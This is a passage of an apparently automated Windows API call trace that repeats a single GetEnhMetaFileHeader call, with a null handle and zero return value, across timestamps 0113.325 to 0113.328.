out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.325] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.326] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.327] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0113.328] 